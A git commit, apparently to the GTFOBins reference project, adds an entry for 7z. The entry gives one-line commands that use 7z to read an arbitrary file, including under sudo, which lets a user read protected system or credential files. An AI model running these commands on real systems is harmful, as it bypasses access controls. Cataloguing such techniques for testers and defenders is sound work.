Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
master
Yuta Yamate 2022-12-16 20:26:45 +09:00 committed by GitHub
parent 18774ef89a
commit 8d82a69fb7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 0 deletions

11
_gtfobins/7z.md Normal file
View File

@ -0,0 +1,11 @@
---
functions:
file-read:
- code: |
LFILE=file_to_read
7z a -ttar -an -so $LFILE | 7z e -ttar -si -so
sudo:
- code: |
LFILE=file_to_read
sudo 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so
---